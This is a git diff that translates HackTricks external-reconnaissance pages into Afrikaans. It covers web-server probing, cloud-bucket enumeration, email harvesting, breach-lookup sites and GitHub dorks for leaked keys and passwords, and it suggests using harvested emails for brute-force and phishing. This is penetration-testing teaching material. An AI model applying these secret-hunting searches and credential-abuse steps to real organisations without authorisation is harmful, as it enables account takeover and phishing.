+**Vind 'n** [**gids**](../pentesting-network/) **oor hoe om gasheer te skandeer.** -## Web servers hunting +## Soek na webbedieners -> We have found all the companies and their assets and we know IP ranges, domains and subdomains inside the scope. It's time to search for web servers. +> Ons het al die maatskappye en hul bates gevind en ons ken IP-reekse, domeine en subdomeine binne die omvang. Dit is tyd om na webbedieners te soek. -In the previous steps you have probably already performed some **recon of the IPs and domains discovered**, so you may have **already found all the possible web servers**. However, if you haven't we are now going to see some **fast tricks to search for web servers** inside the scope. +In die vorige stappe het jy waarskynlik al 'n bietjie **rekognisering van die ontdekte IP's en domeine** gedoen, so jy het dalk **al die moontlike webbedieners al gevind**. As jy dit egter nie gedoen het nie, gaan ons nou kyk na 'n paar **vinnige truuks om na webbedieners** binne die omvang te soek. -Please, note that this will be **oriented for web apps discovery**, so you should **perform the vulnerability** and **port scanning** also (**if allowed** by the scope). - -A **fast method** to discover **ports open** related to **web** servers using [**masscan** can be found here](../pentesting-network/#http-port-discovery).\ -Another friendly tool to look for web servers is [**httprobe**](https://github.com/tomnomnom/httprobe)**,** [**fprobe**](https://github.com/theblackturtle/fprobe) and [**httpx**](https://github.com/projectdiscovery/httpx). You just pass a list of domains and it will try to connect to port 80 (http) and 443 (https). Additionally, you can indicate to try other ports: +Let asseblief daarop dat dit **georiënteer sal wees vir die ontdekking van webtoepassings**, so jy moet ook die **kwesbaarheid** en **poortskenning** uitvoer (**as toegelaat** deur die omvang). +'n **Vinnige metode** om **oop poorte** wat verband hou met **webbedieners** te ontdek deur gebruik te maak van [**masscan** kan hier gevind word](../pentesting-network/#http-port-discovery).\ +'n Ander vriendelike hulpmiddel om na webbedieners te soek is [**httprobe**](https://github.com/tomnomnom/httprobe)**,** [**fprobe**](https://github.com/theblackturtle/fprobe) en [**httpx**](https://github.com/projectdiscovery/httpx). Jy stuur net 'n lys domeine en dit sal probeer om aan te sluit by poort 80 (http) en 443 (https). Daarbenewens kan jy aandui om ander poorte te probeer: ```bash cat /tmp/domains.txt | httprobe #Test all domains inside the file for port 80 and 443 cat /tmp/domains.txt | httprobe -p http:8080 -p https:8443 #Check port 80, 443 and 8080 and 8443 ``` +### **Skermfoto's** -### **Screenshots** +Nou dat jy al die webbedieners in die omvang ontdek het (onder die IP-adresse van die maatskappy en al die domeine en subdomeine), weet jy waarskynlik nie waar om te begin nie. So, maak dit eenvoudig en begin net deur skermfoto's van almal te neem. Deur net na die hoofbladsy te kyk, kan jy vreemde eindpunte vind wat meer geneig is om kwesbaar te wees. -Now that you have discovered **all the web servers** present in the scope (among the **IPs** of the company and all the **domains** and **subdomains**) you probably **don't know where to start**. So, let's make it simple and start just taking screenshots of all of them. Just by **taking a look** at the **main page** you can find **weird** endpoints that are more **prone** to be **vulnerable**. +Om die voorgestelde idee uit te voer, kan jy [EyeWitness](https://github.com/FortyNorthSecurity/EyeWitness), [HttpScreenshot](https://github.com/breenmachine/httpscreenshot), [Aquatone](https://github.com/michenriksen/aquatone), [Shutter](https://shutter-project.org/downloads/third-party-packages/) of [webscreenshot](https://github.com/maaaaz/webscreenshot) gebruik. -To perform the proposed idea you can use [**EyeWitness**](https://github.com/FortyNorthSecurity/EyeWitness), [**HttpScreenshot**](https://github.com/breenmachine/httpscreenshot), [**Aquatone**](https://github.com/michenriksen/aquatone), [**Shutter**](https://shutter-project.org/downloads/third-party-packages/) or [**webscreenshot**](https://github.com/maaaaz/webscreenshot)**.** +Verder kan jy dan [eyeballer](https://github.com/BishopFox/eyeballer) gebruik om deur al die skermfoto's te loop om jou te vertel wat waarskynlik kwesbaarhede bevat, en wat nie. -Moreover, you could then use [**eyeballer**](https://github.com/BishopFox/eyeballer) to run over all the **screenshots** to tell you **what's likely to contain vulnerabilities**, and what isn't. +## Openbare Cloud Bates -## Public Cloud Assets +Om potensiële cloud bates wat aan 'n maatskappy behoort, te vind, moet jy begin met 'n lys sleutelwoorde wat daardie maatskappy identifiseer. Byvoorbeeld, vir 'n kriptomaatskappy kan jy woorde soos "crypto", "wallet", "dao", "", "" gebruik. -In order to find potential cloud assets belonging to a company you should **start with a list of keywords that identify that company**. For example, a crypto for a crypto company you might use words such as: `"crypto", "wallet", "dao", "", <"subdomain_names">`. - -You will also need wordlists of **common words used in buckets**: +Jy sal ook woordlyste van algemene woorde wat in emmers gebruik word, benodig: * [https://raw.githubusercontent.com/cujanovic/goaltdns/master/words.txt](https://raw.githubusercontent.com/cujanovic/goaltdns/master/words.txt) * [https://raw.githubusercontent.com/infosec-au/altdns/master/words.txt](https://raw.githubusercontent.com/infosec-au/altdns/master/words.txt) * [https://raw.githubusercontent.com/jordanpotti/AWSBucketDump/master/BucketNames.txt](https://raw.githubusercontent.com/jordanpotti/AWSBucketDump/master/BucketNames.txt) -Then, with those words you should generate **permutations** (check the [**Second Round DNS Brute-Force**](./#second-dns-bruteforce-round) for more info). +Met daardie woorde moet jy dan permutasies genereer (sien die [Tweede Ronde DNS Brute-Force](./#second-dns-bruteforce-round) vir meer inligting). -With the resulting wordlists you could use tools such as [**cloud\_enum**](https://github.com/initstring/cloud\_enum)**,** [**CloudScraper**](https://github.com/jordanpotti/CloudScraper)**,** [**cloudlist**](https://github.com/projectdiscovery/cloudlist) **or** [**S3Scanner**](https://github.com/sa7mon/S3Scanner)**.** +Met die resulterende woordlyste kan jy gereedskap soos [cloud_enum](https://github.com/initstring/cloud_enum), [CloudScraper](https://github.com/jordanpotti/CloudScraper), [cloudlist](https://github.com/projectdiscovery/cloudlist) of [S3Scanner](https://github.com/sa7mon/S3Scanner) gebruik. -Remember that when looking for Cloud Assets you should l**ook for more than just buckets in AWS**. +Onthou dat wanneer jy na Cloud Bates soek, jy na meer as net emmers in AWS moet kyk. -### **Looking for vulnerabilities** +### **Op soek na kwesbaarhede** -If you find things such as **open buckets or cloud functions exposed** you should **access them** and try to see what they offer you and if you can abuse them. +As jy dinge soos oop emmers of blootgestelde cloudfunksies vind, moet jy toegang daartoe verkry en probeer sien wat hulle bied en of jy dit kan misbruik. -## Emails +## E-posse -With the **domains** and **subdomains** inside the scope you basically have all what you **need to start searching for emails**. These are the **APIs** and **tools** that have worked the best for me to find emails of a company: +Met die domeine en subdomeine binne die omvang het jy basies alles wat jy nodig het om na e-posse te soek. Hier is die API's en gereedskap wat die beste vir my gewerk het om e-posse van 'n maatskappy te vind: -* [**theHarvester**](https://github.com/laramies/theHarvester) - with APIs -* API of [**https://hunter.io/**](https://hunter.io/) (free version) -* API of [**https://app.snov.io/**](https://app.snov.io/) (free version) -* API of [**https://minelead.io/**](https://minelead.io/) (free version) +* [theHarvester](https://github.com/laramies/theHarvester) - met API's +* API van [https://hunter.io/](https://hunter.io/) (gratis weergawe) +* API van [https://app.snov.io/](https://app.snov.io/) (gratis weergawe) +* API van [https://minelead.io/](https://minelead.io/) (gratis weergawe) -### **Looking for vulnerabilities** +### **Op soek na kwesbaarhede** -Emails will come handy later to **brute-force web logins and auth services** (such as SSH). Also, they are needed for **phishings**. Moreover, these APIs will give you even more **info about the person** behind the email, which is useful for the phishing campaign. +E-posse sal later handig wees om webaanmeldings en outentiseringsdienste (soos SSH) met brute force aan te val. Hulle is ook nodig vir hengelpraktyke. Verder sal hierdie API's jou selfs meer inligting gee oor die persoon agter die e-pos, wat nuttig is vir die hengelveldtog. -## Credential Leaks +## Kredensialek -With the **domains,** **subdomains**, and **emails** you can start looking for credentials leaked in the past belonging to those emails: +Met die domeine, subdomeine en e-posse kan jy begin soek na kredensiale wat in die verlede uitgelek het en aan daardie e-posse behoort: * [https://leak-lookup.com](https://leak-lookup.com/account/login) * [https://www.dehashed.com/](https://www.dehashed.com/) -### **Looking for vulnerabilities** +### **Op soek na kwesbaarhede** -If you find **valid leaked** credentials, this is a very easy win. +As jy geldige uitgelekte kredensiale vind, is dit 'n baie maklike oorwinning. -## Secrets Leaks +## Geheimlek -Credential leaks are related to hacks of companies where **sensitive information was leaked and sold**. However, companies might be affected for **other leaks** whose info isn't in those databases: +Kredensialeks is verband hou met hacks van maatskappye waarby sensitiewe inligting uitgelek en verkoop is. Maatskappye kan egter deur ander lekke geraak word waarvan die inligting nie in daardie databasisse is nie: -### Github Leaks +### Github-lekke -Credentials and APIs might be leaked in the **public repositories** of the **company** or of the **users** working by that github company.\ -You can use the **tool** [**Leakos**](https://github.com/carlospolop/Leakos) to **download** all the **public repos** of an **organization** and of its **developers** and run [**gitleaks**](https://github.com/zricethezav/gitleaks) over them automatically. +Kredensiale en API's kan uitgelek word in die openbare bewaarplekke van die maatskappy of van die gebruikers wat vir daardie Github-maatskappy werk. Jy kan die gereedskap [Leakos](https://github.com/carlospolop/Leakos) gebruik om al die openbare bewaarplekke van 'n organisasie en sy ontwikkelaars af te laai en outomaties [gitleaks](https://github.com/zricethezav/gitleaks) daaroor te hardloop. -**Leakos** can also be used to run **gitleaks** agains all the **text** provided **URLs passed** to it as sometimes **web pages also contains secrets**. +Leakos kan ook gebruik word om gitleaks teen al die teksverskaffings-URL's wat aan hom oorgedra word, te hardloop, aangesien webbladsye soms ook geheime bevat. #### Github Dorks -Check also this **page** for potential **github dorks** you could also search for in the organization you are attacking: +Kyk ook na hierdie bladsy vir potensiële Github Dorks wat jy ook in die organisasie wat jy aanval, kan soek: {% content-ref url="github-leaked-secrets.md" %} [github-leaked-secrets.md](github-leaked-secrets.md) {% endcontent-ref %} -### Pastes Leaks +### Pastes-lekke -Sometimes attackers or just workers will **publish company content in a paste site**. This might or might not contain **sensitive information**, but it's very interesting to search for it.\ -You can use the tool [**Pastos**](https://github.com/carlospolop/Pastos) to search in more that 80 paste sites at the same time. +Soms sal aanvallers of net werkers maatskappy-inhoud op 'n plakkerswebwerf publiseer. Dit mag wel of nie sensitiewe inligting bevat nie, maar dit is baie interessant om daarna te soek. Jy kan die gereedskap [Pastos](https://github.com/carlospolop/Pastos) gebruik om gelyktydig in meer as 80 plakkerswebwerwe te soek. ### Google Dorks -Old but gold google dorks are always useful to find **exposed information that shouldn't be there**. The only problem is that the [**google-hacking-database**](https://www.exploit-db.com/google-hacking-database) contains several **thousands** of possible queries that you cannot run manually. So, you can get your favourite 10 ones or you could use a **tool such as** [**Gorks**](https://github.com/carlospolop/Gorks) **to run them all**. +Ou maar goeie Google Dorks is altyd nuttig om blootgestelde inligting wat nie daar behoort te wees nie, te vind. Die enigste probleem is dat die [google-hacking-database](https://www.exploit-db.com/google-hacking-database) verskeie duisende moontlike navrae bevat wat jy nie handmatig kan hardloop nie. Jy kan dus jou gunsteling 10 kies of 'n gereedskap soos [Gorks](https://github.com/carlospolop/Gorks) gebruik om hulle almal uit te voer. -_Note that the tools that expect to run all the database using the regular Google browser will never end as google will block you very very soon._ +Merk op dat die gereedskap wat verwag dat jy die hele databasis met die gewone Google-webblaaier hardloop, nooit sal eindig nie, aangesien Google jou baie baie gou sal blokkeer. -### **Looking for vulnerabilities** +### **Op soek na kwesbaarhede** -If you find **valid leaked** credentials or API tokens, this is a very easy win. +As jy geldige uitgelekte kredensiale of API-tokens vind, is dit 'n baie maklike oorwinning. -## Public Code Vulnerabilities +## Openbare Kodekwesbaarhede -If you found that the company has **open-source code** you can **analyse** it and search for **vulnerabilities** on it. +As jy vind dat die maatskappy oopbronkode het, kan jy dit analiseer en soek na kwesbaarhede daarin. -**Depending on the language** there are different **tools** you can use: +Afhanklik van die taal is daar verskillende gereedskap wat jy kan gebruik: {% content-ref url="../../network-services-pentesting/pentesting-web/code-review-tools.md" %} [code-review-tools.md](../../network-services-pentesting/pentesting-web/code-review-tools.md) {% endcontent-ref %} -There are also free services that allow you to **scan public repositories**, such as: +Daar is ook gratis dienste wat jou in staat stel om openbare bewaarplekke te skandeer, soos: -* [**Snyk**](https://app.snyk.io/) +* [Snyk](https://app.snyk.io/) +## [**Pentesting Web Metodologie**](../../network-services-pentesting/pentesting-web/) -## [**Pentesting Web Methodology**](../../network-services-pentesting/pentesting-web/) +Die **meerderheid van die kwesbaarhede** wat deur foutsoekers gevind word, is binne **webtoepassings**, so op hierdie punt wil ek graag praat oor 'n **webtoepassingstoetsmetodologie**, en jy kan [**hierdie inligting hier vind**](../../network-services-pentesting/pentesting-web/). -The **majority of the vulnerabilities** found by bug hunters resides inside **web applications**, so at this point I would like to talk about a **web application testing methodology**, and you can [**find this information here**](../../network-services-pentesting/pentesting-web/). +Ek wil ook 'n spesiale vermelding maak van die afdeling [**Web Geoutomatiseerde Skanderings oopbronhulpmiddels**](../../network-services-pentesting/pentesting-web/#automatic-scanners), want alhoewel jy nie moet verwag dat hulle baie sensitiewe kwesbaarhede sal vind nie, is hulle handig om hulle te implementeer in **werkstrome om 'n aanvanklike webinligting te verkry.** -I also want to do a special mention to the section [**Web Automated Scanners open source tools**](../../network-services-pentesting/pentesting-web/#automatic-scanners), as, if you shouldn't expect them to find you very sensitive vulnerabilities, they come handy to implement them on **workflows to have some initial web information.** +## Opsomming -## Recapitulation +> Gelukwens! Op hierdie punt het jy reeds **alle basiese opname** uitgevoer. Ja, dit is basies omdat daar nog baie meer opname gedoen kan word (ons sal later meer truuks sien). -> Congratulations! At this point you have already perform **all the basic enumeration**. Yes, it's basic because a lot more enumeration can be done (will see more tricks later). +Jy het reeds: -So you have already: +1. Al die **maatskappye** binne die omvang gevind +2. Al die **bates** wat aan die maatskappye behoort, gevind (en 'n paar kwesbaarheidsskanderings uitgevoer as dit binne die omvang val) +3. Al die **domeine** wat aan die maatskappye behoort, gevind +4. Al die **subdomeine** van die domeine gevind (enige subdomein-oorgawe?) +5. Al die **IP's** (van en **nie van CDN's**) binne die omvang gevind. +6. Al die **webbedieners** gevind en 'n **skermkiekie** van hulle geneem (enige iets vreemds wat 'n dieper kyk werd is?) +7. Al die **potensiële openbare wolkbates** wat aan die maatskappy behoort, gevind. +8. **E-posse**, **geloofsbriewe-lekke** en **geheimlekkasies** wat jou 'n **groot wen baie maklik** kan gee. +9. **Pentesting van al die webwerwe wat jy gevind het** -1. Found all the **companies** inside the scope -2. Found all the **assets** belonging to the companies (and perform some vuln scan if in scope) -3. Found all the **domains** belonging to the companies -4. Found all the **subdomains** of the domains (any subdomain takeover?) -5. Found all the **IPs** (from and **not from CDNs**) inside the scope. -6. Found all the **web servers** and took a **screenshot** of them (anything weird worth a deeper look?) -7. Found all the **potential public cloud assets** belonging to the company. -8. **Emails**, **credentials leaks**, and **secret leaks** that could give you a **big win very easily**. -9. **Pentesting all the webs you found** +## **Volledige Opname Outomatiese Hulpmiddels** -## **Full Recon Automatic Tools** - -There are several tools out there that will perform part of the proposed actions against a given scope. +Daar is verskeie hulpmiddels beskikbaar wat 'n deel van die voorgestelde aksies teen 'n gegewe omvang sal uitvoer. * [**https://github.com/yogeshojha/rengine**](https://github.com/yogeshojha/rengine) * [**https://github.com/j3ssie/Osmedeus**](https://github.com/j3ssie/Osmedeus) * [**https://github.com/six2dez/reconftw**](https://github.com/six2dez/reconftw) -* [**https://github.com/hackerspider1/EchoPwn**](https://github.com/hackerspider1/EchoPwn) - A little old and not updated +* [**https://github.com/hackerspider1/EchoPwn**](https://github.com/hackerspider1/EchoPwn) - 'n Bietjie oud en nie opgedateer nie -## **References** +## **Verwysings** -* All free courses of [**@Jhaddix**](https://twitter.com/Jhaddix) like [**The Bug Hunter's Methodology v4.0 - Recon Edition**](https://www.youtube.com/watch?v=p4JgIu1mceI) +* Alle gratis kursusse van [**@Jhaddix**](https://twitter.com/Jhaddix) soos [**The Bug Hunter's Methodology v4.0 - Recon Edition**](https://www.youtube.com/watch?v=p4JgIu1mceI) \ -**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**! +**Bug bounty wenk**: **teken aan** vir **Intigriti**, 'n premium **bug bounty-platform wat deur hackers geskep is, vir hackers**! Sluit vandag by ons aan by [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) en begin om belonings tot **$100,000** te verdien! {% embed url="https://go.intigriti.com/hacktricks" %}
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy in HackTricks wil adverteer** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFT's**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
diff --git a/generic-methodologies-and-resources/external-recon-methodology/github-leaked-secrets.md b/generic-methodologies-and-resources/external-recon-methodology/github-leaked-secrets.md index 677d7fa70..35f04d05b 100644 --- a/generic-methodologies-and-resources/external-recon-methodology/github-leaked-secrets.md +++ b/generic-methodologies-and-resources/external-recon-methodology/github-leaked-secrets.md @@ -2,30 +2,30 @@
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PRs in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
\ -**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**! +**Bug bounty wenk**: **teken aan** vir **Intigriti**, 'n premium **bug bounty-platform geskep deur hackers, vir hackers**! Sluit vandag by ons aan by [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks), en begin verdien belonings tot **$100,000**! {% embed url="https://go.intigriti.com/hacktricks" %} -Now that we have built the list of assets of our scope it's time to search for some OSINT low-hanging fruits. +Nou dat ons die lys van bates in ons omvang gebou het, is dit tyd om te soek na sommige OSINT-laaghangende vrugte. -### Platforms that already searched for leaks +### Platforms wat reeds na lekke gesoek het * [https://trufflesecurity.com/blog/introducing-forager/](https://trufflesecurity.com/blog/introducing-forager/) -### Api keys leaks in github +### Api-sleutellekke in github * [https://github.com/dxa4481/truffleHog](https://github.com/dxa4481/truffleHog) * [https://github.com/gitleaks/gitleaks](https://github.com/gitleaks/gitleaks) @@ -40,7 +40,6 @@ Now that we have built the list of assets of our scope it's time to search for s * [https://github.com/obheda12/GitDorker](https://github.com/obheda12/GitDorker) ### **Dorks** - ```bash ".mlab.com password" "access_key" @@ -322,17 +321,16 @@ GCP SECRET AWS SECRET "private" extension:pgp ``` -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslagplekke.
diff --git a/generic-methodologies-and-resources/external-recon-methodology/wide-source-code-search.md b/generic-methodologies-and-resources/external-recon-methodology/wide-source-code-search.md index 03816699e..480f006c1 100644 --- a/generic-methodologies-and-resources/external-recon-methodology/wide-source-code-search.md +++ b/generic-methodologies-and-resources/external-recon-methodology/wide-source-code-search.md @@ -1,43 +1,43 @@ -# Wide Source Code Search +# Wydse Bronkode Soektog
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
-The goal of this page is to enumerate **platforms that allow to search for code** (literal or regex) in across thousands/millions of repos in one or more platforms. +Die doel van hierdie bladsy is om **platforms op te som wat soektogte vir kode** (letterlik of regex) in duisende/miljoene opslagplekke op een of meer platforms toelaat. -This helps in several occasions to **search for leaked information** or for **vulnerabilities** patterns. +Dit help in verskeie gevalle om te **soek na uitgelekde inligting** of na **kwesbaarheidspatrone**. -* [**SourceGraph**](https://sourcegraph.com/search): Search in millions of repos. There is a free version and an enterprise version (with 15 days free). It supports regexes. -* [**Github Search**](https://github.com/search): Search across Github. It supports regexes. - * Maybe it's also useful to check also [**Github Code Search**](https://cs.github.com/). -* [**Gitlab Advanced Search**](https://docs.gitlab.com/ee/user/search/advanced\_search.html): Search across Gitlab projects. Support regexes. -* [**SearchCode**](https://searchcode.com/): Search code in millions of projects. +* [**SourceGraph**](https://sourcegraph.com/search): Soek in miljoene opslagplekke. Daar is 'n gratis weergawe en 'n ondernemingsweergawe (met 15 dae gratis). Dit ondersteun regexes. +* [**Github Soektog**](https://github.com/search): Soek deur Github. Dit ondersteun regexes. +* Dit mag ook nuttig wees om ook [**Github Kodesoektog**](https://cs.github.com/) te kyk. +* [**Gitlab Gevorderde Soektog**](https://docs.gitlab.com/ee/user/search/advanced\_search.html): Soek deur Gitlab-projekte. Ondersteun regexes. +* [**SearchCode**](https://searchcode.com/): Soek kode in miljoene projekte. {% hint style="warning" %} -When you look for leaks in a repo and run something like `git log -p` don't forget there might be **other branches with other commits** containing secrets! +Wanneer jy na lekke in 'n opslagplek soek en iets soos `git log -p` hardloop, moenie vergeet dat daar dalk **ander takke met ander commits** wat geheime bevat nie! {% endhint %}
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
diff --git a/generic-methodologies-and-resources/pentesting-methodology.md b/generic-methodologies-and-resources/pentesting-methodology.md index c574cb48d..d2b2fce80 100644 --- a/generic-methodologies-and-resources/pentesting-methodology.md +++ b/generic-methodologies-and-resources/pentesting-methodology.md @@ -1,176 +1,175 @@ -# Pentesting Methodology +# Pentesting Metodologie
